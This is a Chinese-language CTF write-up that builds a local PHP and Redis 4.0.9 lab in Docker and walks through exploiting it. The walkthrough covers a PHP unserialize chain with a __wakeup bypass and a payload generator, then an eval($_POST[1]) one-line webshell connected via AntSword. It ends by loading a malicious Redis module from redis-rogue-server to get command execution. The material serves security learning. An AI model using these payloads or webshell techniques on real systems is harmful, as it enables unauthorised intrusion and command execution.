最近打了很多比赛,很多题没有做出来。所以决定复现一下某些题目。
本地环境的搭建
本地环境涉及到php的web服务、redis数据库。
Dockerfile的编写
FROM ubuntu:16.04
COPY src/sources.list /etc/apt/sources.list
COPY src/redis-4.0.9 /home/redis-4.0.9
RUN apt-get update && \
apt-get install -y curl \
software-properties-common \
python3-software-properties \
python-software-properties \
unzip \
vim
RUN apt-get install -y apache2
RUN service apache2 restart
RUN locale -a
RUN export LANG=C.UTF-8 && \
add-apt-repository ppa:ondrej/php && \
apt-get update
RUN apt-get install -y libapache2-mod-php7.0 \
libzend-framework-php \
php7.0-cli \
php7.0 \
php7.0-bcmath \
php7.0-bz2 \
php7.0-cgi \
php7.0-common \
php7.0-fpm \
php7.0-gmp \
php-http \
php-imagick \
php7.0-intl \
php7.0-json \
php7.0-mbstring \
php-memcache \
php-memcached \
php7.0-mysql \
php7.0-recode \
php7.0-gd \
php7.0-mcrypt \
php7.0-xml \
php7.0-pdo \
php7.0-opcache \
php7.0-curl \
php7.0-zip
RUN apt install -y gcc \
make
RUN cd /home/redis-4.0.9 &&\
cp -r /home/redis-4.0.9 /usr/local/redis &&\
cd /usr/local/redis &&\
make && make PREFIX=/usr/local/redis install &&\
export REDIS_HOME=/usr/local/redis &&\
export PATH=$PATH:$REDIS_HOME/bin
COPY src /tmp/src
RUN mv /tmp/src/web.ini /etc/php/7.0/apache2/conf.d/php.ini &&\
rm -rf /var/www/html &&\
mv /tmp/src/html /var/www/html &&\
mv /tmp/src/start.sh /start.sh &&\
chmod +x /start.sh
EXPOSE 80
CMD ["/start.sh"]
按照流程编写docker-compose.yml文件,并将相应的文件放到src目录下
其中web.ini就是php的配置文件,可以在里面设置disable_function等。至此,题目基本搭建完成。
反序列化执行eval语句
访问web服务,看到如下php代码
<?php
class A{
public $code = "";
function __call($method,$args){
eval($this->code);
}
function __wakeup(){
$this->code = "";
}
}
class B{
function __destruct(){
echo $this->a->a();
}
}
if(isset($_REQUEST['poc'])){
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
unserialize($_REQUEST['poc']);
}
}else{
highlight_file(__FILE__);
}
这里需要触发A类里面的eval函数,才可以进行命令执行。通过unserialize反序列化,触发__destruct函数。由于这里的destruct函数可以将$this->a作为对象来执行a()函数,所以这里可以触发 __call方法。但需要注意的是__wakeup函数会在这个类初始化之前触发。如果等这个函数触发之后,再去执行我们得call方法,那么code变量就是一个空字符串了,无法达到我们想要的效果。
绕过wakeup,需要属性数量和实际属性数量不相同。同样这里有正则
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
如果按照以下方式编写payload是无法通过正则的
<?php
class A{
public $code = 'phpinfo();';
}
class B{
public $a;
}
$b = new B();
$b->a = new A();
echo serialize($b);
这里要求A或B这两个字符后面跟随的数字是1,否则就会退出程序。
这里只需要在B这个类的后面再添加一个属性,这样B的属性数量变为2,反序列化时将B的属性数量改为1,即可绕过wakeup函数。
这样一来,就成功执行phpinfo函数。
redis加载恶意so文件
将上面的phpinfo();函数改为一句话木马eval($_POST[1]);使用蚁剑连接
接下来使用数据操作功能连接上redis
可以看到版本号是4.0.9,使用https://github.com/Dliv3/redis-rogue-server上的so文件。redis加载该文件,即可完成命令执行,访问到被限制访问的文件。
